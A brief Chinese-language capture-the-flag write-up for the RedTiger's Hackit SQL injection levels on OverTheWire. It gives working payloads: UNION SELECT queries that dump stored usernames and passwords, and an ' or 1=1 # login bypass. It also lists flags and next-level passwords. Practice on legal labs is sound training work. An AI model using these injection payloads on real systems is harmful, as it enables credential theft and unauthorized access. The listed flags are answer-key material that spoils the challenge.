RedTiger's Hackit wirteup

sql注入挑战

level1

简单注入,payload:

http://redtiger.labs.overthewire.org/level1.php?cat=0 union select 1,2,username,password from level1_users

返回

Hornoxe

thatwaseasy

登录后显示

You made it!

You can raise your wechall.net score with this flag: 27cbddc803ecde822d87a7e8639f9315

The password for the next level is: passwords_will_change_over_time_let_us_do_a_shitty_rhyme

 

level2

万能密码登录bs抓包改POST内容:username=admin&password=' or 1=1 # &login=Login

You can raise your wechall.net score with this flag: 1222e2d4ad5da677efb188550528bfaa

The password for the next level is: feed_the_cat_who_eats_your_bread

 

level3

输入数组显示报错信息

Warning: preg_match() expects parameter 2 to be string, array given in /var/www/html/hackit/urlcrypt.inc on line 26

构造http://redtiger.labs.overthewire.org/urlcrypt.inc 得到源码

用源码加密明文' union select 1,password,2,3,4,5,6 from level3_users where username=’Admin

后构造payload

http://redtiger.labs.overthewire.org/level3.php?usr=MDc2MTUxMDIyMTc3MTM5MjMwMTQ1MDI0MjA5MTAwMTc3MTUzMDc0MTg3MDk1MDg0MjQzMDE3MjUyMDI1MTI2MTU2MTc2MTMzMDAwMjQ2MTU2MjA4MTgyMDk2MTI5MjIwMDQ5MDUyMjMwMTk4MTk2MTg5MTEzMDQxMjQwMTQ0MDM2MTQwMTY5MTcyMDgzMjQ0MDg3MTQxMTE1MDY2MTUzMjE0MDk1MDM4MTgxMTY1MDQ3MTE4MDg2MTQwMDM0MDg1MTE4MTE4MDk5MjIyMjE4MDEwMTkwMjIwMDcxMDQwMjIw

得到

Show userdetails:

Username:         thisisaverysecurepasswordEEE5rt

First name:         5

Name:         6

ICQ:         4

Email:         3

登录得到

Login correct. You are admin :);

You can raise your wechall.net score with this flag: a707b245a60d570d25a0449c2a516eca

The password for the next level is: put_the_kitten_on_your_head

 

level4

盲注

 

Level5

登录过滤

待续

你可能感兴趣的:(WriteUp)